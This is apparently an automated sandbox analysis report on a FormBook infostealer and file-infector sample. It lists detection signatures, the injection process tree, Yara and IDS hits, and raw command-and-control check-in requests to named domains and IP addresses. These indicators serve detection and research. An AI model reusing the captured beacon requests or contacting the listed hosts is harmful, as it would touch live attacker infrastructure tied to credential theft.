Windows Analysis Report
OVZizpEU7Q.exe

Overview

General Information

Sample name: OVZizpEU7Q.exe
renamed because original name is a hash value
Original sample name: 8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09.exe
Analysis ID: 1587962
MD5: b5c6ac313fa5167296fbe879f26c4e0f
SHA1: d03372158b51e7c5925b372758a52ea118d5e09b
SHA256: 8ddfda62decd6de3185b1ec3bebe067a20a124a39f8483afa9bbc47b3f3d0c09
Tags: exe, Worm, m0yv, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Found direct / indirect Syscall (likely to bypass EDR)
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • OVZizpEU7Q.exe (PID: 6092 cmdline: "C:\Users\user\Desktop\OVZizpEU7Q.exe" MD5: B5C6AC313FA5167296FBE879F26C4E0F)
    • svchost.exe (PID: 4580 cmdline: "C:\Users\user\Desktop\OVZizpEU7Q.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • CkszoACLEZHP.exe (PID: 4680 cmdline: "C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • choice.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\choice.exe" MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
          • firefox.exe (PID: 5400 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • armsvc.exe (PID: 4672 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 43F9E491CFEB42E75ED6C50912305629)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ParentImage: C:\Users\user\Desktop\OVZizpEU7Q.exe, ParentProcessId: 6092, ParentProcessName: OVZizpEU7Q.exe, ProcessCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ProcessId: 4580, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ParentImage: C:\Users\user\Desktop\OVZizpEU7Q.exe, ParentProcessId: 6092, ParentProcessName: OVZizpEU7Q.exe, ProcessCommandLine: "C:\Users\user\Desktop\OVZizpEU7Q.exe", ProcessId: 4580, ProcessName: svchost.exe

                AV Detection

                Source: OVZizpEU7Q.exeAvira: detected
                Source: http://54.244.188.177/8#Avira URL Cloud: Label: malware
                Source: http://www.duwixushx.xyz/u11p/Avira URL Cloud: Label: malware
                Source: http://www.44ynh.top/tw1g/Avira URL Cloud: Label: malware
                Source: http://www.sunnyz.store/px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPTAvira URL Cloud: Label: malware
                Source: http://54.244.188.177/Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/wlyolqtsAvira URL Cloud: Label: malware
                Source: http://54.244.188.177/rO#Avira URL Cloud: Label: malware
                Source: http://54.244.188.177/y#Avira URL Cloud: Label: malware
                Source: http://www.44ynh.top/tw1g/?bbg=fX3UOxnLllreThWFlcCTjb1Gj8v81Qg4BBMMPlWtmipxCrV4LuGb/+qUB8ds6Milzu4Vsg6gjoKyWT3+exaSJF/XiV2wljFcpTs2dr1B9jzRtZTommTdOKRk2oHkAr6Pug==&4Hph=tXCXkpKPTAvira URL Cloud: Label: malware
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: C:\Windows\System32\alg.exeAvira: detection malicious, Label: W32/Infector.Gen
                Source: OVZizpEU7Q.exe, Virustotal: Detection: 73%
                Source: OVZizpEU7Q.exeReversingLabs: Detection: 86%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4758299557.0000000004D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4758261090.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4762982458.00000000062F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2689551851.0000000006FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4757299419.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2685415495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2686604210.00000000049E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4758462130.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                Source: C:\Windows\System32\alg.exeJoe Sandbox ML: detected
                Source: OVZizpEU7Q.exeJoe Sandbox ML: detected
                Source: OVZizpEU7Q.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: choice.pdbGCTL source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2286369112.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
                Source: Binary string: ALG.pdbGCTL source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: CkszoACLEZHP.exe, 00000006.00000002.4758052353.000000000081E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297299983.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, OVZizpEU7Q.exe, 00000000.00000003.2297520146.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2583676735.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2685927099.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2585501083.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.0000000004F50000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2688054476.0000000004DA3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000003.2685693574.0000000004BF3000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000007.00000002.4758446013.00000000050EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: ALG.pdb source: OVZizpEU7Q.exe, 00000000.00000003.2297347898.0000000004200000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
                Source: Binary string: choice.pdb source: svchost.exe, 00000002.00000003.2654664755.000000000362B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2654649568.000000000361A000.00000004.00000020.00020000.00000000.sdmp, CkszoACLEZHP.exe, 00000006.00000002.4758129802.000000000097E000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exe, System file written: C:\Windows\System32\alg.exe
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_0046445A
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C6D1 FindFirstFileW,FindClose,0_2_0046C6D1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0046C75C
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046EF95
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0046F0F2
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046F3F3
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_004637EF
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00463B12
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0046BCBC

                Networking

                Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49739 -> 54.244.188.177:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 217.70.184.50:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49996 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49999 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 38.165.29.234:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50029 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50038 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50033 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50042 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50032 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50036 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50039 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50041 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 154.23.184.207:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50043 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50046 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50047 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 38.181.21.178:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50040 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 156.251.17.224:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50034 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50035 -> 147.255.21.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50048 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50037 -> 185.68.16.160:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50027 -> 185.104.45.157:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50049 -> 63.250.43.134:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50050 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50053 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50030 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50051 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50031 -> 209.74.77.107:80
                Source: DNS query: www.duwixushx.xyz
                Source: DNS query: www.oneeyetrousersnake.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox View IP Address: 194.195.220.41
                Source: Joe Sandbox View IP Address: 13.248.169.48
                Source: Joe Sandbox View IP Address: 209.74.77.107
                Source: Joe Sandbox View ASN Name: NEXINTO-DE
                Source: Joe Sandbox View ASN Name: MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox View ASN Name: CSLDE
                Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49739
                Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49739
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\OVZizpEU7Q.exeCode function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_004722EE
                Source: global trafficHTTP traffic detected: GET /px6j/?bbg=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKIcNk+JBVCRg1ULnR0r9g0wTL26GmNj8vjUZJtELrX7TXSA==&4Hph=tXCXkpKPT HTTP/1.1Host: www.sunnyz.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ffw/?bbg=tAagZsHUdJyyT40ohv2IEKVVuTBc1VBL1ZYJ8ve7IxnIk8U1vVUcZfnPN6bfj6aG1UJ/NhZtBjoMrT4UOPB/cVOBm4LELiXS/YOPTGiXcR6tARW7Ah+E+UdM0p2Er0wI+Q==&4Hph=tXCXkpKPT HTTP/1.1Host: www.d48dk.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /d3gs/?4Hph=tXCXkpKPT&bbg=klKY6dvkP+O30B+HpvvIDDpax0dTsaw1cNmHC/CObJBnEjCTb6SXj4/f8yRqIefmit/6AMXcJNK+4aPls5ALe658TBhWz2YaAyzI8Rgx/2lRGZqP2V4f93z8nfndcdsgJQ== HTTP/1.1Host: www.8312zcksnu.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4nyz/?bbg=bcM/JQ/EFwFWYQgtTOOS35rqoFMdviegTJKmxIpJofhFkyJMRpTUGtC91ZUPZRMbUbNKXBeHApNsAXJ+OHtLcHkhoPHfVvEc20VtfW60da7XULV2w8gZY/6X5GlG7rybNg==&4Hph=tXCXkpKPT HTTP/1.1Host: www.snyp.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
